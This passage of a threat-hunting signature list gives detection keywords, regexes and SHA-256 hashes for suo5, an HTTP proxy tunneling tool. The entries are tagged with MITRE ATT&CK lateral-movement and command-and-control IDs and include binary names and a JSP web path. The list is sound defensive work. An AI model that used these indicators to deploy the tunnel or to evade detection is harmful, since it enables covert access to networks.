"*/suo5-linux-arm64*",".{0,1000}\/suo5\-linux\-arm64.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","1","N/A","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z" "*/suo5-windows-amd64.exe*",".{0,1000}\/suo5\-windows\-amd64\.exe.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","1","N/A","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z" "*:8070/tomcat/code/suo5.jsp*",".{0,1000}\:8070\/tomcat\/code\/suo5\.jsp.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","1","N/A","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z" "*\suo5-gui-darwin.app.zip*",".{0,1000}\\suo5\-gui\-darwin\.app\.zip.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","N/A","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z" "*\suo5-gui-windows.exe*",".{0,1000}\\suo5\-gui\-windows\.exe.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","N/A","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z" "*\suo5-windows-amd64.exe*",".{0,1000}\\suo5\-windows\-amd64\.exe.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","N/A","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z" 
"*01a2453132babc0a02bf8a02a5dce58e75a6c4fe9bddbcc5659141fff047a13f*",".{0,1000}01a2453132babc0a02bf8a02a5dce58e75a6c4fe9bddbcc5659141fff047a13f.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z" "*01d500c870f17df9745b6973a23efd33c05fe74680bb6bc1a0b5b74681480996*",".{0,1000}01d500c870f17df9745b6973a23efd33c05fe74680bb6bc1a0b5b74681480996.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z" "*025c823bad7f5449606f1eebb3f486e723e6b41f3d809b59c0b4f2367ef14b41*",".{0,1000}025c823bad7f5449606f1eebb3f486e723e6b41f3d809b59c0b4f2367ef14b41.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z" "*0b1359c7b13b51d57bc917ca161f659550137e223ae0e317c3b4911fdfe59c7e*",".{0,1000}0b1359c7b13b51d57bc917ca161f659550137e223ae0e317c3b4911fdfe59c7e.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z" "*13dc14feae0ebb2947f49a047754133869fcefe72931f156232d109bc7fc9e03*",".{0,1000}13dc14feae0ebb2947f49a047754133869fcefe72931f156232d109bc7fc9e03.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - 
TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z" "*14cb4039e1416fce558039dc2548cf185ae6e695479440d711992b238da6ef14*",".{0,1000}14cb4039e1416fce558039dc2548cf185ae6e695479440d711992b238da6ef14.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z" "*16ab17e1d91f55e133cea7ca0fcc38d0105b48e05975d86db76b556057e8ca8b*",".{0,1000}16ab17e1d91f55e133cea7ca0fcc38d0105b48e05975d86db76b556057e8ca8b.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z" "*1792c809507a1b92737bd04b12cabaf28b36e7fc08ae524704317679ddb62844*",".{0,1000}1792c809507a1b92737bd04b12cabaf28b36e7fc08ae524704317679ddb62844.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z" "*17c6bc3e9a1d4086f3079f9bc140362f1278b8364777020b9ddddecf5fa7da94*",".{0,1000}17c6bc3e9a1d4086f3079f9bc140362f1278b8364777020b9ddddecf5fa7da94.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z" 
"*17fd691675f7b9dcfe22195f729177613116448c4b5173e5f035bb4a3f67a361*",".{0,1000}17fd691675f7b9dcfe22195f729177613116448c4b5173e5f035bb4a3f67a361.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z" "*19d9a81e3487b8a0624b927ca9a0703a716a383d41d61a22d4a1e20777713923*",".{0,1000}19d9a81e3487b8a0624b927ca9a0703a716a383d41d61a22d4a1e20777713923.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z" "*1a863b55ce99ee16151b756a7e9a26ac2b8d86e7bfa69ff99a6c0883ea25a6a6*",".{0,1000}1a863b55ce99ee16151b756a7e9a26ac2b8d86e7bfa69ff99a6c0883ea25a6a6.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z" "*1af99ff0796b156af3e46c20926f5aa5bd30e82821d7def568eae8a62ed44819*",".{0,1000}1af99ff0796b156af3e46c20926f5aa5bd30e82821d7def568eae8a62ed44819.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z" "*1b6c1c7541fe63d8b93d2ecdd39fa84fbabe464ad75fc822ccdea8b8bb0e3e56*",".{0,1000}1b6c1c7541fe63d8b93d2ecdd39fa84fbabe464ad75fc822ccdea8b8bb0e3e56.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - 
TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z" "*1da8555f3513b39d821fc95a6a76ed4cd1b56ffcb30fc13c0eda59576ba5ebc4*",".{0,1000}1da8555f3513b39d821fc95a6a76ed4cd1b56ffcb30fc13c0eda59576ba5ebc4.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z" "*1fd13e23e6e0959dc50d24207282f3873937f2e97c5f20205cef84d58dacc676*",".{0,1000}1fd13e23e6e0959dc50d24207282f3873937f2e97c5f20205cef84d58dacc676.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z" "*201281dccb6437ae62550434e78ff9cae3c2c19b7af8e9e55a3d1e89e32342d4*",".{0,1000}201281dccb6437ae62550434e78ff9cae3c2c19b7af8e9e55a3d1e89e32342d4.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z" "*213021164bd91cb9caa8ea2ea283ff353349778d7e6e3c456a83224c11e55e3e*",".{0,1000}213021164bd91cb9caa8ea2ea283ff353349778d7e6e3c456a83224c11e55e3e.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z" 
"*21f3a4015365376e1ba970afadcdf7ac5a13ba78feea2ed22f18de63872f2daa*",".{0,1000}21f3a4015365376e1ba970afadcdf7ac5a13ba78feea2ed22f18de63872f2daa.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z" "*2925973758d3d69cd2a8d4e6b504b367d4d664faecf422e49e614622d7cdb7d5*",".{0,1000}2925973758d3d69cd2a8d4e6b504b367d4d664faecf422e49e614622d7cdb7d5.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z" "*338e40f0af3c9e5afe576a70b19b005239fb97bd028891a1040ffd974927070f*",".{0,1000}338e40f0af3c9e5afe576a70b19b005239fb97bd028891a1040ffd974927070f.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z" "*37f9d73191d95d637f39fdc07f8ddead00f0093d3459a43b7b3f8e00ecf261af*",".{0,1000}37f9d73191d95d637f39fdc07f8ddead00f0093d3459a43b7b3f8e00ecf261af.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z" "*3a4957346500bfcb99f671ffde44447a7d25da2f17e9ceefd68944beceb687b2*",".{0,1000}3a4957346500bfcb99f671ffde44447a7d25da2f17e9ceefd68944beceb687b2.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - 
TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z" "*3b03a0738da391cc91566ea46c9b2a672546a0dcca12d3c6f2c10664c8c8e100*",".{0,1000}3b03a0738da391cc91566ea46c9b2a672546a0dcca12d3c6f2c10664c8c8e100.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z" "*3c6bef218514ed8b5f4b07dac9005fa1f844750589c60d9c39e8ac2c2b6c6373*",".{0,1000}3c6bef218514ed8b5f4b07dac9005fa1f844750589c60d9c39e8ac2c2b6c6373.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z" "*3d4704e3a7c0c5d4d1c0a272160e7d0944a017cea7cb08b367689f89516e4e6c*",".{0,1000}3d4704e3a7c0c5d4d1c0a272160e7d0944a017cea7cb08b367689f89516e4e6c.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z" "*3dec7fe9898d3e4b31c6d61a1316390572bc6964128f14ad1595e4b252e10085*",".{0,1000}3dec7fe9898d3e4b31c6d61a1316390572bc6964128f14ad1595e4b252e10085.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z" 
"*402b28519547fad2da345db67120a53369c50bfa90807fff186e3cdafad82de1*",".{0,1000}402b28519547fad2da345db67120a53369c50bfa90807fff186e3cdafad82de1.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z" "*40b9410d301646531ac34beb1e22c3ac94742d21fd0d701b8b9b4fa04481e6fb*",".{0,1000}40b9410d301646531ac34beb1e22c3ac94742d21fd0d701b8b9b4fa04481e6fb.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z" "*40dbbb8a09fa361ae16c91c374e435391b9104989241ba67389e2dc15d9e6034*",".{0,1000}40dbbb8a09fa361ae16c91c374e435391b9104989241ba67389e2dc15d9e6034.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z" "*44ce6895d6f3ed6945853af571d2ac24cb04a55ff4fa9425952181b840a028d2*",".{0,1000}44ce6895d6f3ed6945853af571d2ac24cb04a55ff4fa9425952181b840a028d2.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z" "*45bc362420127dc6d00395da6c61d94036da73d110119965a52a8d83a5a88d31*",".{0,1000}45bc362420127dc6d00395da6c61d94036da73d110119965a52a8d83a5a88d31.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - 
TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z" "*4749831085b1c88950bff5d47d87409a05018597224f4149a22844163e6e1b75*",".{0,1000}4749831085b1c88950bff5d47d87409a05018597224f4149a22844163e6e1b75.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z" "*482f372f9e30c5d31eb06c3ca96f4ae58df4aee2e714b1a613f21d99f478dfcf*",".{0,1000}482f372f9e30c5d31eb06c3ca96f4ae58df4aee2e714b1a613f21d99f478dfcf.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z" "*48ca8e0be856ea824d915079a443f1aeca29ec805290d8605066f7ab59401abe*",".{0,1000}48ca8e0be856ea824d915079a443f1aeca29ec805290d8605066f7ab59401abe.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z" "*4f6a58fe1d179d2c9811e76d2cc469b5843bb5fddf9a5561b2b257810ae9416c*",".{0,1000}4f6a58fe1d179d2c9811e76d2cc469b5843bb5fddf9a5561b2b257810ae9416c.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z" 
"*501555b3f33f3591deab2ab1b070502b45d63cf3c744661b7a32edc8f498e6ed*",".{0,1000}501555b3f33f3591deab2ab1b070502b45d63cf3c744661b7a32edc8f498e6ed.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z" "*50d81308031ff4cd24705d157d6c5cf7d6e8afe7bec4bb2bbbadbd6699ad7a3f*",".{0,1000}50d81308031ff4cd24705d157d6c5cf7d6e8afe7bec4bb2bbbadbd6699ad7a3f.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z" "*52ca645cfcf80cfa3278dc9ec47105cd22995f39028082ba209a4ebcbb7844fe*",".{0,1000}52ca645cfcf80cfa3278dc9ec47105cd22995f39028082ba209a4ebcbb7844fe.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z" "*54f11fb39afb17eeaa9c68482cf68e415ed87c3eb80f2fa9ead6431ddcf25bcc*",".{0,1000}54f11fb39afb17eeaa9c68482cf68e415ed87c3eb80f2fa9ead6431ddcf25bcc.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z" "*55639c41a6ce5640182e63fbada1460f4d5eb77d7ca28cd03b5f81326a5ffd08*",".{0,1000}55639c41a6ce5640182e63fbada1460f4d5eb77d7ca28cd03b5f81326a5ffd08.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - 
TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z" "*5571e24e95485116507bad42b229ca77a98da4ab7ce161d45f35ddacab12a3d6*",".{0,1000}5571e24e95485116507bad42b229ca77a98da4ab7ce161d45f35ddacab12a3d6.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z" "*5f43060bb9404309475297ee50dfe456863be25e3e4fc2e8c31300f471d3cc48*",".{0,1000}5f43060bb9404309475297ee50dfe456863be25e3e4fc2e8c31300f471d3cc48.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z" "*68a061deb112b2c02ba5f146b2dfc13ac8eafea91f15cb7f0f760bad4cc0c560*",".{0,1000}68a061deb112b2c02ba5f146b2dfc13ac8eafea91f15cb7f0f760bad4cc0c560.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z" "*699c657acc47997abe868108294ab6625eae117242db51d6db5a715606a3e56e*",".{0,1000}699c657acc47997abe868108294ab6625eae117242db51d6db5a715606a3e56e.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z" 
"*6bf2e2c83556bad748940200d1ab7e6d10906a50062a0e5ac6ffe779b4449428*",".{0,1000}6bf2e2c83556bad748940200d1ab7e6d10906a50062a0e5ac6ffe779b4449428.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z" "*6c40ba5215fcdfbe5dabad38ef1202a1a95b5f31663f695bf404e8075674723e*",".{0,1000}6c40ba5215fcdfbe5dabad38ef1202a1a95b5f31663f695bf404e8075674723e.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z" "*6eaacd4b20f6cc94e884edde513bb561f7ce54e3388cb751caa2ffe6b781202e*",".{0,1000}6eaacd4b20f6cc94e884edde513bb561f7ce54e3388cb751caa2ffe6b781202e.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z" "*70ff1ea046dbf3a51880965281a9d6a19b87e297303660346d36e7cb7969cd48*",".{0,1000}70ff1ea046dbf3a51880965281a9d6a19b87e297303660346d36e7cb7969cd48.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z" "*74c5657c473f13396e3200188c9958acd722072e26af9f6df55e623fb1bb15f8*",".{0,1000}74c5657c473f13396e3200188c9958acd722072e26af9f6df55e623fb1bb15f8.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - 
TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z" "*7a755ed0f04fbb2ca6f802761b50036315ca25802a44a528287911dfaea2ed2a*",".{0,1000}7a755ed0f04fbb2ca6f802761b50036315ca25802a44a528287911dfaea2ed2a.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z" "*7d0a1148c6f19ad8597975d65092e77a088de255c958e80403e33eb9826279ca*",".{0,1000}7d0a1148c6f19ad8597975d65092e77a088de255c958e80403e33eb9826279ca.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z" "*803441002d464ed753650ca0b322c96a939a7b9d073f9277367b51ea4a894cd5*",".{0,1000}803441002d464ed753650ca0b322c96a939a7b9d073f9277367b51ea4a894cd5.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z" "*80f47ef29cb32968c968bee785edf06e0cddc927cc016d7a735c7209300c813e*",".{0,1000}80f47ef29cb32968c968bee785edf06e0cddc927cc016d7a735c7209300c813e.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z" 
"*82b39dd75bda38dccb8f026507c583490b2f37dd299a2efde3c2d20b4a0143b0*",".{0,1000}82b39dd75bda38dccb8f026507c583490b2f37dd299a2efde3c2d20b4a0143b0.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z" "*86c8dd3f7083c274723554ad02410bbdaf990836ce6d6047cf3d759bc6761cf5*",".{0,1000}86c8dd3f7083c274723554ad02410bbdaf990836ce6d6047cf3d759bc6761cf5.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z" "*8807e7e0d5bf8197bc51533f3731adb29a89f1cb18355d3a3d59a88d73119464*",".{0,1000}8807e7e0d5bf8197bc51533f3731adb29a89f1cb18355d3a3d59a88d73119464.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z" "*8b1100e30d38c19fde571ff97412e66cdd2aef68c3699dcdb6b8416798db3cfb*",".{0,1000}8b1100e30d38c19fde571ff97412e66cdd2aef68c3699dcdb6b8416798db3cfb.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - 